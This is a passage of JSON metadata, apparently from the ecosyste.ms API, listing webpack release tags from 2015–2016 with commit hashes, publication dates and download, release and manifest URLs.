itories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/